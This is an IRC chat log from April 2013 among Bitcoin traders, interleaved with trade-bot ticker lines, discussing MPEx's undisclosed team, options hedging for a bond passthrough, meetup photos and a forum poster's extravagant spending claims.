21:36:57 [BTCTC] [GSDPT] 510 @ 0.003 = 1.53 BTC [-] Apr 28 21:38:21 sooo, whats new Apr 28 21:38:30 [BTCTC] [BTC-BOND] 165 @ 0.01 = 1.65 BTC [+] Apr 28 21:38:42 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Apr 28 21:40:24 there's a new bitcoin exchange Apr 28 21:40:29 there's a new asic producer Apr 28 21:40:37 there's a new "investment opportunity" Apr 28 21:41:10 there's a new "gtfo by mpoe-pr post" Apr 28 21:41:49 that for sure. Apr 28 21:42:10 [BTCTC] [ASICMINER-PT] 1 @ 1.31 BTC [+] Apr 28 21:44:07 anyone got cas coins for sale, i need a few moar Apr 28 21:45:02 kakobrekla https://bitcointalk.org/index.php?topic=188735.msg1967971#msg1967971 Apr 28 21:45:07 ask and thou shalt recieve Apr 28 21:45:42 hm Apr 28 21:45:55 is the definition of who shouldnt be doing what getting broader? Apr 28 21:46:58 how do you mean ? Apr 28 21:49:39 moar rant Apr 28 21:49:40 https://bitcointalk.org/index.php?topic=189895.msg1968364#msg1968364 Apr 28 21:50:35 bah Apr 28 21:50:36 typo Apr 28 21:50:57 fixd Apr 28 21:58:52 [MPEX] [S.MPOE] 4423 @ 0.00066115 = 2.9243 BTC [+] Apr 28 21:58:54 [MPEX] [S.MPOE] 4965 @ 0.00068029 = 3.3776 BTC [+] Apr 28 21:59:03 [MPEX] [S.MPOE] 5300 @ 0.00069403 = 3.6784 BTC [+] Apr 28 21:59:05 [MPEX] [S.MPOE] 1200 @ 0.00069498 = 0.834 BTC [+] Apr 28 21:59:06 [MPEX] [S.MPOE] 8000 @ 0.00069884 = 5.5907 BTC [+] Apr 28 21:59:15 [MPEX] [S.MPOE] 3450 @ 0.00071 = 2.4495 BTC [+] Apr 28 21:59:15 for all the bile and hate about children building technology from MPOEPR we have no idea who makes up mircea's team Apr 28 21:59:31 not following the chan are you :p Apr 28 21:59:46 i think i got contacted by a scammer and he is trying to sell some cas coins (and i think he doest even know what that is) Apr 28 21:59:48 [MPEX] [S.MPOE] 10000 @ 0.00071 = 7.1 BTC [+] Apr 28 21:59:51 lets have some fun Apr 28 21:59:53 Who's behind it? Our team consists of seasoned traders with experience in some of the worlds most successful banks, investment banks and accounting firms. Apr 28 21:59:57 kidding! Apr 28 22:00:16 [MPEX] [S.MPOE] 10000 @ 0.00071 = 7.1 BTC [+] Apr 28 22:00:23 chan's not terribly persistent or searchable Apr 28 22:01:10 assbot has been keeping logs for a few days now Apr 28 22:01:10 benkay k 1 sec Apr 28 22:01:11 [MPEX] [S.MPOE] 3148 @ 0.00071 = 2.2351 BTC [+] Apr 28 22:01:19 ill make it public soonish Apr 28 22:01:25 and searchable i guess Apr 28 22:01:48 I have logs for most of the past month or two Apr 28 22:02:04 [MPEX] [S.MPOE] 49514 @ 0.00071 = 35.1549 BTC [+] Apr 28 22:02:21 i have logs from 1 year ago but they are all fucked up Apr 28 22:02:25 i'm trying to highlight the double standard of "no pro-grade team called out on site, where team is expected to be called out" vs the MPEx approach which is "MPEx is run by someone well versed in power dynamics and getting people to do things. trust him to select the right people to do things." Apr 28 22:02:37 chat logs are not public declaration of team makeup. Apr 28 22:02:45 they're chat logs. Apr 28 22:03:34 thats another issue Apr 28 22:03:54 benkay http://pastebin.com/VJ2W6xg4 Apr 28 22:03:56 towards the end Apr 28 22:04:52 nope Apr 28 22:04:55 but who are those humans? Apr 28 22:05:06 "cfo" Apr 28 22:05:11 "lead counsel" Apr 28 22:05:20 "exercise to reader" Apr 28 22:05:21 rly? Apr 28 22:05:25 [BTCTC] [S.DICE-PT] 1 @ 0.00338 BTC [+] Apr 28 22:05:33 no names Apr 28 22:05:35 no employment histories Apr 28 22:05:40 heh. mkay. Apr 28 22:05:45 no demonstrations of past success. Apr 28 22:05:50 martha is already named there. she's named on the domain registratiosn too. Apr 28 22:05:51 http://lists.w3.org/Archives/Public/w3c-wai-ig/2002JulSep/0110.html Apr 28 22:05:53 for instance. Apr 28 22:06:05 [HAVELOCK] [HIM] 1 @ 1.775 BTC [-] Apr 28 22:06:26 the famous court proceedings where i beat back the romanian govt had been amply linked but i guess you never saw that. Apr 28 22:06:32 [BTCTC] [S.DICE-PT] 1 @ 0.00338 BTC [+] Apr 28 22:06:34 guy's name is florin cristescu, it's all over that. Apr 28 22:06:36 have not, not. Apr 28 22:06:49 in other words : none of this is a secret, it's known by people who care to know as it were. Apr 28 22:08:04 but if I say, 'dear mircea_popescu, where would I go to learn about the amazing team you've assembled to run your business?' your answer is 'do some research, child' Apr 28 22:08:38 [BTCTC] [S.DICE-PT] 1 @ 0.002753 BTC [-] Apr 28 22:08:41 you do see why dominant position would ensure one such luxury Apr 28 22:08:42 which induces a bit of culture shock, in that i generally expect people to be proud of the team they work with, and eager to show that they're above board and real grownups etc. Apr 28 22:08:46 oh of course Apr 28 22:08:49 whereas being an upstart would not ? Apr 28 22:08:55 [BTCTC] [COGNITIVE] 1 @ 0.17 BTC [-] Apr 28 22:09:14 after all, i'm not proving myself to random unknown noob on the forum Apr 28 22:09:16 he is proving himself to me. Apr 28 22:09:23 trust is this directional affair. Apr 28 22:09:41 mircea_popescu: I just sold some panties for 1 bitcoin Apr 28 22:09:43 if he doesn't trust me that's pretty much of no import. if i don't trust him that's a serious impairment on his future. Apr 28 22:10:29 we should drop this exchange nonsense and get into the lingerie business yo Apr 28 22:11:17 hm panties4btc Apr 28 22:11:58 I guess I'm just bemused by the difference in approach towards image in your area. Apr 28 22:12:09 "but i lols so powerful image is nothing" Apr 28 22:12:28 i don't follow benkay ? Apr 28 22:12:46 big American companies are obsessed with image. Apr 28 22:13:04 big American investors are obsessed with image. Apr 28 22:13:08 transparency, etc. Apr 28 22:13:27 image != transparency Apr 28 22:13:37 yeah i thin kthere's some conflation at work here. Apr 28 22:13:40 image = f(transparency and other shit) Apr 28 22:14:12 not really, no. but anyway. it isn't/never was a matter of "do some research child". in the sense that i answered if asked, but in general stuff is known. Apr 28 22:15:34 so returning to culture shock, I'm accustomed to things being indexed instead of known Apr 28 22:15:47 yeah. Apr 28 22:15:58 hey, it's btc you know ? Apr 28 22:16:06 i'm giving a slightly different approach a go. Apr 28 22:16:12 and you're endeavoring to write new rules, I get it. Apr 28 22:16:26 well at least make some motherfucking sense Apr 28 22:16:29 benkay, i suspect mp's people would prefer their privacy over "image" Apr 28 22:16:36 i know i would Apr 28 22:16:39 ThickAsThieves some care more than others. Apr 28 22:16:56 it's an issue here, i mean : for years the ONLY way you could get anyone with any sort of license to even consider bitcoin Apr 28 22:17:05 is if you swore on dead saints you will never release their name Apr 28 22:17:15 so this veers into philosophy and prognostication, but how much longer can anyone expect any information to remain unindexed? Apr 28 22:17:21 this because being a financial professional is highly regulated, they'd have to get an ok from their compliance officer, Apr 28 22:17:25 which would never happen etc. Apr 28 22:17:51 consider bitcoin what? Apr 28 22:17:55 benkay indefinitely in principle. unless something happens to show me the model is fundamentally flawed, i think it will carry on forever. Apr 28 22:18:08 benkay consider bitcoin. in their head. Apr 28 22:18:37 but if you hire them and their compliance officer?did you contract with existing financial firms to do accounting and backoffice etc? Apr 28 22:19:14 also I hate asking questions that have been answered already. aversion to repetition and all that. Apr 28 22:19:18 no listen. the year is 2011. i get excited about this new btc thing. i know what it needs to have a chance. i know i need help. i know whose help i need. Apr 28 22:19:27 i talk to these people. well... they can't get involved. Apr 28 22:19:30 so what now / Apr 28 22:19:49 why can't they get involved? risking their licensure? Apr 28 22:20:05 do you know how this profession is organised ? Apr 28 22:20:21 in the us? to an extent. in romania? no clue. Apr 28 22:20:29 and which profession? Apr 28 22:21:21 I'm not sure why eother of you think this conversation will go anywhere Apr 28 22:21:32 ThickAsThieves naivite. Apr 28 22:21:33 mp knows i'm actually trying to learn stuff Apr 28 22:21:52 benkay basically, it's a team of people with various types of licenses, a boss, a compliance officer and some more sdupport roles. Apr 28 22:22:08 the rule - simplified - is that nobody can get involved into ANYTHING related to their day job even vaguely Apr 28 22:22:14 w/o clearing it with the compliance officer. Apr 28 22:22:24 this includes things like giving interviews even. Apr 28 22:22:33 got it. so everyone's doing this as a side job? Apr 28 22:22:48 people (actual people in this chan) have been sacked for nonsense like, telling a reporter they make a lot of money and are living the life. Apr 28 22:23:08 now. the compliance officer is NEVER going to ok something like "bitcoin". because he only ok's on positive factual knowledge it's ok. Apr 28 22:23:16 so if it's dubious, then it's not gettiong ok. Apr 28 22:24:23 so, to round this up : for all the bullshit "we're getting ws involved" coming out of purely puff style start-ups like coin-whatever, Apr 28 22:24:32 [BTCTC] [ASICMINER-PT] 1 @ 1.3001 BTC [-] Apr 28 22:24:36 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] Apr 28 22:24:36 ws people were involved since 2011/early 2012, in the only way they could be. Apr 28 22:24:41 which is, secretly. Apr 28 22:24:43 [BTCTC] [ASICMINER-PT] 2 @ 1.3 = 2.6 BTC [-] Apr 28 22:24:59 [BTCTC] [ASICMINER-PT] 1 @ 1.27 BTC [-] Apr 28 22:25:16 [BTCTC] [ASICMINER-PT] 1 @ 1.269001 BTC [-] Apr 28 22:25:19 [BTCTC] [ASICMINER-PT] 15 @ 1.269 = 19.035 BTC [-] Apr 28 22:26:21 that makes a startling amount of sense. Apr 28 22:26:21 that's as to why you will likely never know who's on my short list of people i talk to / scream at / with on macroeconomic topics, finance etc. Apr 28 22:26:33 now, the coders are often uninterested in talking to the public. Apr 28 22:26:46 other than that, some people don't care, which is why you get the names/mugs of some people. Apr 28 22:28:30 and you anticipate maintaining the privacy wall indefinitely? Apr 28 22:28:42 0/1/infinity is the rule Apr 28 22:28:50 hah Apr 28 22:28:52 since i'm doing it it's not 0. unless some sort of obvious 1 hits me over the head Apr 28 22:28:54 it's infinity. Apr 28 22:29:33 so at this get together, did some people not tell others who they were? Apr 28 22:29:44 or do all involved know eachother's identity Apr 28 22:30:01 some people met in person lol. some haven't. each his cup of tea Apr 28 22:30:25 0 information leakage is a secret kept by 1 person. some information leakage happens when more than 1 person knows stuff. eventually, all information will leak. infinity? Apr 28 22:30:29 its obv much cooler if some attendees used fake names Apr 28 22:31:05 ya, eventually all information will leak which is why you know who killed kennedy or w/e Apr 28 22:31:15 hm. Apr 28 22:31:23 hehe Apr 28 22:31:33 [BTCTC] [ASICMINER-PT] 1 @ 1.2681 BTC [-] Apr 28 22:31:35 that's more of a signal to noise claim, sir. Apr 28 22:31:50 [BTCTC] [ASICMINER-PT] 2 @ 1.268 = 2.536 BTC [-] Apr 28 22:32:01 just making the point that information will leak is this proposition of statistics Apr 28 22:32:06 it may be true, but it may not help you. Apr 28 22:32:11 [BTCTC] [ASICMINER-PT] 1 @ 1.2671 BTC [-] Apr 28 22:32:23 oh granted Apr 28 22:32:34 [BTCTC] [ASICMINER-PT] 7 @ 1.267 = 8.869 BTC [-] Apr 28 22:32:36 but there's lots of noise in the market and some traders manage to beat the mean year after year Apr 28 22:32:39 [BTCTC] [ASICMINER-PT] 1 @ 1.265 BTC [-] Apr 28 22:32:42 well other than that i was answering the q of how long im doing something Apr 28 22:32:45 not how long it works Apr 28 22:32:47 [BTCTC] [ASICMINER-PT] 1 @ 1.255 BTC [-] Apr 28 22:33:03 mircea_popescu: what about information which leaks once its harmless? Apr 28 22:33:10 to lump it all together does not seem right Apr 28 22:33:16 yeah. Apr 28 22:33:17 [BTCTC] [ASICMINER-PT] 1 @ 1.251 BTC [-] Apr 28 22:33:33 [BTCTC] [ASICMINER-PT] 1 @ 1.2501 BTC [-] Apr 28 22:33:34 it's amazing how this conversation gets more and more interesting Apr 28 22:33:37 (but the statistics holds indeed) Apr 28 22:33:40 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] Apr 28 22:33:44 [BTCTC] [ASICMINER-PT] 3 @ 1.25 = 3.75 BTC [-] Apr 28 22:33:51 ThickAsThieves you just fucked it up Apr 28 22:34:01 lol Apr 28 22:34:06 ;) Apr 28 22:34:16 any time Apr 28 22:35:08 but really, it started as benkay asking what give mpoe-pr/mpex/mp the right to question others experience, and turned into, i dunno Apr 28 22:35:20 no not question Apr 28 22:35:24 everyone has the right to question Apr 28 22:35:50 expressed shock at attitude of "who are you" when we know, like, MP Apr 28 22:35:53 sometimes my words mean more than what the dictionarys defines them as Apr 28 22:36:10 i think that means using it wrong Apr 28 22:36:22 i prefer "creatively" Apr 28 22:37:11 success in comms is expressing things in a way that everyone understands Apr 28 22:37:22 failure in comms is ambiguity Apr 28 22:37:32 did realize what i said was so confusing... Apr 28 22:37:43 didnt* Apr 28 22:37:58 mircea_popescu: do you have steam? Apr 28 22:38:01 nope Apr 28 22:38:03 I'ma buy you the GTA complete pack Apr 28 22:38:07 boring conversation Apr 28 22:38:09 http://i.imgur.com/5nvlW.gif Apr 28 22:39:40 (sfw) Apr 28 22:40:38 I used to work close to the beach, would be sfw then Apr 28 22:43:36 sadly no Apr 28 22:52:10 folks, if there is anyone still interested in MPOE bonds passthrough or has workable ideas, Apr 28 22:52:26 discuss here: https://bitcointalk.org/index.php?topic=131270.msg1968876#msg1968876 Apr 28 22:52:45 We have one month hiatus to come up with something. Apr 28 22:53:01 ;;nethash Apr 28 22:53:02 73971.4334572 Apr 28 22:56:36 [MPEX] [S.MPOE] [PAID] 378.21006095 BTC to 500`000`000 shares, 75 satoshi per share Apr 28 22:57:22 wowee Apr 28 22:57:53 ooooook Apr 28 22:58:16 that's it, one full year of dividends ftw. Apr 28 23:01:39 ;;calc 37821006095/500000000 Apr 28 23:01:39 75.64201219 Apr 28 23:03:04 why my fkn code insists on 39 satoshi? Apr 28 23:03:30 jurov maybe an idea is to get a limited hedging involved. Apr 28 23:03:57 as in, buy some options on the same package as the bond. maybe everyone buying shares gets to vote which way to go, calls or puts Apr 28 23:04:25 course all this is becoming rather complicated. Apr 28 23:05:02 and then vote when they should be sold/exercised.. yeah Apr 28 23:05:35 (that was ironic yeah) Apr 28 23:05:56 yeah i know... Apr 28 23:06:16 I wanted to do an options fund, but current pricing makes it seem like it'd most likely be a loser as well Apr 28 23:06:17 i had some preliminary idea with smickles to have alternative bot Apr 28 23:06:27 that could also hedge per option sold Apr 28 23:06:33 ThickAsThieves well listen you can't BOTH be losers. Apr 28 23:06:48 but he's not around anymore Apr 28 23:06:49 i am suspecting the bot is exactly right because everyone agrees price is making them lose money Apr 28 23:07:12 bot is def playing it smarter Apr 28 23:07:37 [BTCTC] [ASICMINER-PT] 1 @ 1.2551 BTC [+] Apr 28 23:07:46 but opportunity for profit for both bond holders and option buyers has been very minimized Apr 28 23:07:51 no but let's run a model here. so, 1k btc bond. Apr 28 23:08:10 if past data is any indication, say a 200% upswing or 60% downswing causes losses of about 25% Apr 28 23:08:22 so then you need calls that will make 250 btc if price goes up 3x Apr 28 23:08:30 and puts that make 250 btc if price goes down 60% Apr 28 23:09:11 ;;ticker Apr 28 23:09:12 BTCUSD ticker | Best bid: 132.10000, Best ask: 132.39998, Bid-ask spread: 0.29998, Last trade: 132.40000, 24 hour volume: 29432.97051216, 24 hour low: 126.01101, 24 hour high: 136.68000, 24 hour vwap: 132.09045 Apr 28 23:09:15 132*3 Apr 28 23:09:22 ;;calc 132*3 Apr 28 23:09:23 396 Apr 28 23:09:48 O.USD.C302T for instance will make about .25 each if price goes there. so you need 100 these Apr 28 23:09:48 *could* happen... Apr 28 23:09:54 i mean 1000 these Apr 28 23:09:58 so they cost like 70 btc. Apr 28 23:10:08 the call side cost to hedge the bond is then 7% Apr 28 23:10:30 (if these numbers are worth a shit at all) Apr 28 23:11:36 problem is, the price is more likely to move maybe 50% upward, or 25% downward this month (very roughly speaking) Apr 28 23:11:55 lol ThickAsThieves Apr 28 23:12:22 ThickAsThieves so then sell short puts/calls Apr 28 23:12:27 that'll make you money in that scenario Apr 28 23:13:29 i'm not interested in creating options Apr 28 23:13:45 too much risk ;) Apr 28 23:13:54 i want easy money obv Apr 28 23:14:41 [BTCTC] [ASICMINER-PT] 1 @ 1.26502 BTC [+] Apr 28 23:14:52 [BTCTC] [ASICMINER-PT] 1 @ 1.265 BTC [-] Apr 28 23:15:07 [BTCTC] [ASICMINER-PT] 1 @ 1.255 BTC [-] Apr 28 23:15:16 [BTCTC] [ASICMINER-PT] 2 @ 1.25 = 2.5 BTC [-] Apr 28 23:17:52 ya well, sometimes those curves meet Apr 28 23:18:01 fear, greed, cleverness Apr 28 23:20:24 thickasthieves what a good buy point ya think Apr 28 23:20:43 i cashed out at $147 for the most part Apr 28 23:21:59 isnt that kinda q what bitc-anal channel is for? Apr 28 23:22:48 but to answer your question, i have bids lined up incrementally from 126ish downward Apr 28 23:24:55 “Birchbox requested 300,000 units of a product for free; in return, they said that could offer a conservative purchase order of 400 units for that product if it was received well by their sampling audience.” Birchbox also requested a special sample size, which Ms. Chan would need to create, that would yield at least 3 uses of the product. After Ms. Chan negotiated with them, they lowered the amount of requested fre Apr 28 23:24:55 e product to 75,000 and then to 50,000 units (for a more targeted customer base). Birchbox only wanted to pay for a purchase order of 400 units after receiving 50,000 units for free. Apr 28 23:25:10 lmao. basically people think cheek equals business nao Apr 28 23:25:40 Mircea is the owner and master of #bitcoin-anal, if he can find it in his good will, I would not mind being Curator of all culture anal that is also bitcoin. Apr 28 23:26:08 Ya thanks for your insight, thats where I was but I pulled down to $110-$105 and $100 when I saw the rising wedge pattern. Apr 28 23:26:55 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Apr 28 23:27:11 wait what ? Apr 28 23:27:32 hehe Apr 28 23:30:11 kakobrekla you need a better forum avatar. Apr 28 23:30:27 me too Apr 28 23:30:31 too furry for my taste Apr 28 23:30:58 http://polimedia.us/dtng/c/src/134679696766.jpg Apr 28 23:31:01 crop that for instance. Apr 28 23:31:05 [HAVELOCK] [SDICE] 8 @ 0.32 = 2.56 BTC [+] Apr 28 23:38:59 [BTCTC] [B.YABMC] 59 @ 0.0163 = 0.9617 BTC [+] Apr 28 23:39:39 I'd hit that Apr 28 23:40:01 not my taste but damn Apr 28 23:42:57 "big girls need love too" Apr 28 23:45:46 lol i meant to have serious word with mpex staff, but was under impression they are not there Apr 28 23:46:03 now i'm reading i sat practically next to the cto, martha Apr 28 23:46:56 plus got blindsided by teh lawyer "we dun do english, it's unlike romanian" Apr 28 23:47:12 jurov lol. he's not very english friendly Apr 28 23:48:16 anyway, girl next to the lawyer is the cfo Apr 28 23:48:18 money girl. Apr 28 23:48:49 "and in the top pic right under me woman behind chair is martha mcculler, my cto" << so you accidentally a letter Apr 28 23:49:14 oh there are wo women Apr 28 23:49:32 but who took the photos Apr 28 23:49:34 a slave? Apr 28 23:49:53 ThickAsThieves: they have waitresses in romania, ya know Apr 28 23:50:00 pshaw Apr 28 23:51:19 okay, nevermind Apr 28 23:53:04 the lawyer was actually trying to do something in english. but then i mentioned german,and *then* he got derpy Apr 28 23:54:05 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1999 = 0.9995 BTC [+] Apr 28 23:54:05 so i should prolly learn french, italian, romanian, or gypsy or whatever to be able to talk to mpex lawyer... Apr 28 23:54:39 heh, there's a my little pony called Derpy https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcTIF1scwXYZkmC1WaLxSZEq31VPMnkMGxnAjYuBhmtTBxcSt_VJ Apr 28 23:56:18 mircea, tell him "te šukar čhavo" from me Apr 28 23:56:45 [BTCTC] [COGNITIVE] 10 @ 0.17 = 1.7 BTC [-] Apr 28 23:57:20 [BTCTC] [ASICMINER-PT] 1 @ 1.30839 BTC [+] Apr 28 23:58:26 lol Apr 28 23:58:41 what do you need romanian lawyer for anyway ? Apr 28 23:58:50 just in case Apr 28 23:58:56 haha Apr 28 23:59:59 [BTCTC] [B.YABMC] 5 @ 0.0165 = 0.0825 BTC [+] Apr 29 00:00:06 jurov actually when i paid on saturday i left a tip saying "and this is for excellent photographic services" poiting at the little cute girl that took pics Apr 29 00:00:07 There are currently 161956.19 bitcoins demanded at or over 50.0 USD, worth 14094287.1966 USD in total. | Data vintage: 0.0093 seconds Apr 29 00:00:10 and she got all blushed up Apr 29 00:00:22 There are currently 0 bitcoins demanded at or over 200.0 USD, worth 0.0 USD in total. | Data vintage: 15.8877 seconds Apr 29 00:00:29 There are currently 77298.99 bitcoins offered at or under 200.0 USD, worth 12819857.1188 USD in total. | Data vintage: 22.0946 seconds Apr 29 00:00:35 There are currently 20345.892 bitcoins offered at or under 150.0 USD, worth 2904644.02498 USD in total. | Data vintage: 28.8253 seconds Apr 29 00:00:42 this after me asking her if she knows about picture taking which i think she misunderstood as being asked whether she;'d like to pose for us Apr 29 00:00:44 There are currently 29728.823 bitcoins demanded at or over 120.0 USD, worth 3697689.88514 USD in total. | Data vintage: 37.0461 seconds Apr 29 00:00:50 ^^^ ThickAsThieves, you see: no slavery involved Apr 29 00:02:05 oh well Apr 29 00:03:59 jurov: so you're the one in dark clothes in front of mp? Apr 29 00:05:25 no, mpoe-pr's knee points to me Apr 29 00:06:14 goatee and glasses? Apr 29 00:06:21 you look a LOT like my brother Apr 29 00:07:08 no thanks. i have a doppelganger in my neighborhood already Apr 29 00:07:39 actually i was waiting on a bus stop and got greeted "hi thomas.. uh.. it's you?" Apr 29 00:07:47 hehe Apr 29 00:07:58 lol Apr 29 00:09:07 i wonder how long it takes till everyone is identified Apr 29 00:09:18 obv i never noticed him myself... prolly am not looking into mirror often enough Apr 29 00:09:21 talking about benkay's eternal secrecy. Apr 29 00:09:29 wat Apr 29 00:09:33 apparently even posting pics takes > 1 week and even so it's mostly selfouting Apr 29 00:10:03 watman Apr 29 00:10:17 benkay conspiraci! Apr 29 00:10:17 i hold that eternal secrecy is extremely difficult to enforce Apr 29 00:10:27 well ya Apr 29 00:10:39 but you have an edge in scale of conspiracy :) Apr 29 00:10:50 big banks rig all of the things and it takes years for the proles to figure it out Apr 29 00:10:55 but that's because proles Apr 29 00:11:06 time to go bask in sun with wimmins Apr 29 00:11:10 and dogs Apr 29 00:11:13 later all Apr 29 00:11:18 take pics Apr 29 00:11:22 then we identify the dogs. Apr 29 00:11:31 har Apr 29 00:11:49 also, pigeons was there: Apr 29 00:11:56 https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-prn1/923355_10151462244158710_569991901_n.jpg Apr 29 00:15:50 [BTCTC] [ASICMINER-PT] 1 @ 1.3079 BTC [-] Apr 29 00:16:55 [BTCTC] [ASICMINER-PT] 1 @ 1.3084 BTC [+] Apr 29 00:17:16 it would be fun to know which forum personalities were there and guess who was who Apr 29 00:17:29 i actually had guessed ccorrectly which was jurov Apr 29 00:17:55 from the pigeons photo? congrats Apr 29 00:18:31 forum/irc Apr 29 00:18:35 no from the dinner photos Apr 29 00:26:49 mircea_popescu i need a better avatar?? Apr 29 00:26:55 whats wrong with this one Apr 29 00:27:00 well wtf is it Apr 29 00:27:19 seriously? Apr 29 00:27:53 well not that seriously :D Apr 29 00:27:59 its from space odyssey 2001 Apr 29 00:28:30 i just really like clarke Apr 29 00:29:22 https://code.google.com/p/google-glass-kernel-source/ Apr 29 00:32:59 [MPEX] [S.MPOE] 34050 @ 0.00070741 = 24.0873 BTC [-] Apr 29 00:33:07 http://imgur.com/WxnxWDU Apr 29 00:34:30 lol bitstamp, email response after 12 days. Apr 29 00:34:33 [MPEX] [O.USD.C140T] 240 @ 0.31992958 = 76.7831 BTC [+] Apr 29 00:34:45 they are acting all goxxy and shit Apr 29 00:36:16 [BTCTC] [ASICMINER-PT] 1 @ 1.3146 BTC [+] Apr 29 00:36:59 looks like we heading down son Apr 29 00:37:12 lmao insanely bleak advice Apr 29 00:38:31 i mean up Apr 29 00:38:33 lol Apr 29 00:38:50 ;;ticker Apr 29 00:38:51 BTCUSD ticker | Best bid: 133.51485, Best ask: 134.26987, Bid-ask spread: 0.75502, Last trade: 133.51484, 24 hour volume: 27266.58910626, 24 hour low: 126.51000, 24 hour high: 136.68000, 24 hour vwap: 132.73170 Apr 29 00:39:02 [MPEX] [O.USD.C170N] 24 @ 0.41105585 = 9.8653 BTC Apr 29 00:39:08 !t m ^oix Apr 29 00:39:10 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 53.96737151 / 213.47292862 / 218.28703767 (419 shares, 115.18 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 29 00:39:17 well if you believe the oix... Apr 29 00:39:20 and down i dont mean by a lot, its been $135/$136 I mean down by $132/$130 maybe Apr 29 00:39:32 im just looking at what i can see from orders Apr 29 00:42:30 [MPEX] [S.MPOE] 10000 @ 0.00071 = 7.1 BTC [+] Apr 29 00:45:45 [MPEX] [S.MPOE] 5000 @ 0.000714 = 3.57 BTC [+] Apr 29 00:45:47 [MPEX] [S.MPOE] 921 @ 0.00071424 = 0.6578 BTC [+] Apr 29 00:45:48 [MPEX] [S.MPOE] 1779 @ 0.00071432 = 1.2708 BTC [+] Apr 29 00:46:54 [BTCTC] [ASICMINER-PT] 1 @ 1.2801 BTC [-] Apr 29 00:47:33 [MPEX] [S.BBET] 82000 @ 0.00175 = 143.5 BTC [+] Apr 29 00:58:57 There are currently 28426.554 bitcoins demanded at or over 120.0 USD, worth 3530329.68514 USD in total. | Data vintage: 0.0108 seconds Apr 29 01:06:58 HOLD ON Apr 29 01:07:18 SoulKhan do i know you from twitter ? Apr 29 01:07:34 idk Apr 29 01:07:38 a kk. Apr 29 01:08:03 you know him from the streets Apr 29 01:08:22 and your jew rap roots Apr 29 01:08:26 serving up those lyrical treats :) Apr 29 01:08:40 lol Apr 29 01:08:43 lolk Apr 29 01:11:51 [BTCTC] [ASICMINER-PT] 1 @ 1.2801 BTC [-] Apr 29 01:11:54 kakobrekla, you fiddling with modes again? ThickAsThieves can't go in Apr 29 01:12:07 eh? Apr 29 01:12:46 Cannot join channel (+r) - you need to be identified with services Apr 29 01:16:47 jurov: romstina je neco jako stredoevropsky esperanto :) Apr 29 01:18:33 a cestina svetovy jazyk :) Apr 29 01:19:08 well why doesn't he register! Apr 29 01:19:11 it's good for health Apr 29 01:22:51 hi all Apr 29 01:23:56 mjr_ hi. have you seen latest reptilia's microeconomics lesson? Apr 29 01:24:22 it caused me giggling attacks for several hours Apr 29 01:24:25 hi mjr___ Apr 29 01:24:49 what did reprillia do? Apr 29 01:25:18 jurov link ? Apr 29 01:25:38 https://bitcointalk.org/index.php?topic=174620.120;topicseen Apr 29 01:25:51 ty Apr 29 01:25:57 his burn rate computations Apr 29 01:26:06 lemme aim... Apr 29 01:27:45 whatever, just read it wohle carefully. seems everyone finds some different kind of utter ridiculousness there Apr 29 01:28:19 I was operating at a peak $200k per month burnrate at that moment, so just out of curiosity I calculated, how large a stash of bitcoins would be needed, to keep up such a spending permanently. Apr 29 01:28:23 we already had a round earlier, when he was inviting me goat and satoshi Apr 29 01:28:43 never had this ident problem before, if there's someone that can pm me to help set up mu mIRC properly, it'd be appreciated Apr 29 01:28:48 yes, but i don't see anything about this burn rate theory Apr 29 01:29:00 ThickAsThieves you seem id'd now Apr 29 01:29:17 I have currently increased the size of my organisation, and reserved some prime resources (such as the most expensive by far hotel suite in Finland) for my exclusive use. My burn rate is currently about $200,000 per month if I continue at this level. It may sound like much, but measured hourly, it is a more understandable $278 (about 2,000mBTC). Since most of the resources are contracted at a daily rate (such as the hotel) or even hourly ( Apr 29 01:29:20 what more do you want Apr 29 01:29:26 did it got cut? Apr 29 01:29:34 i thought i had it all in my settings already, but now i also need to know how to change my pass Apr 29 01:29:42 which doesnt seem to be in the options Apr 29 01:29:46 (most of the staff, taxi, etc.), I can adjust the burn rate in quick order if need be. I plan on spending at this rate until midnight (8.5 more hours), and keep the room till noon, tomorrow. After that my organisation will be readjusted at about $25 per hour (about 200mBTC). Apr 29 01:29:54 yes. this should be teached in personal finance classes Apr 29 01:31:04 kakobrekla roflmao Apr 29 01:31:13 lol, who is this guy? Apr 29 01:31:21 https://bitcointalk.org/index.php?topic=174620.msg1950796#msg1950796 Apr 29 01:31:22 thar Apr 29 01:32:01 mjr___ seems you're not on his invite list. Apr 29 01:32:35 oh, and i forgot... shall we conspire to put ganjix on hisinvite list somehow? Apr 29 01:33:26 maybe we can concoct something with wao Apr 29 01:34:04 [BTCTC] [ASICMINER-PT] 1 @ 1.2801 BTC [-] Apr 29 01:34:09 jurov the part where he goes "I purposely omitted people not in this forum from the list." but then invites me is pretty cool. Apr 29 01:35:25 also, phinnaeus and atlas would be prudent to have Apr 29 01:35:43 well then go for maria too Apr 29 01:35:44 [BTCTC] [CRYPTO-TRADE] 2 @ 0.19989 = 0.3998 BTC [-] Apr 29 01:36:02 can somebody enlighten me re: what's interesting about the rpietila clown? is there proof that even one of the things he's claimed is true? Apr 29 01:36:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Apr 29 01:36:41 theres proof on facebook. Apr 29 01:36:54 hm? Apr 29 01:37:01 and has anyone checked the EXIF strings in his photos for interesting tidbits? Apr 29 01:37:46 asciilifeform, it's not whether it is true, it's the epic ridiculousness of all and every detail Apr 29 01:38:16 to my untrained eye, he seems like a comedian trying to spoof MP Apr 29 01:38:40 why does everyone think he;'s trying to spoof me ? Apr 29 01:38:45 truffles: I don't believe the man exists as described Apr 29 01:38:46 why not maxkeiser ? why not mega ? Apr 29 01:38:56 why not whoever other bitcoin jezuz Apr 29 01:39:20 also : he deleted his post going "here is proof that at least 3 women attended" ?! Apr 29 01:39:36 mircea_popescu: the "BTC vampire billionaire" image Apr 29 01:39:37 (of which one's the mother of the other two by the sour mouth) Apr 29 01:41:31 somebody intends to test the "pound of image is worth an once of performance" hypothesis Apr 29 01:41:42 *damn, reversed Apr 29 01:41:56 lol Apr 29 01:43:40 [BTCTC] [BTC-GOLD] 3 @ 0.00111 = 0.0033 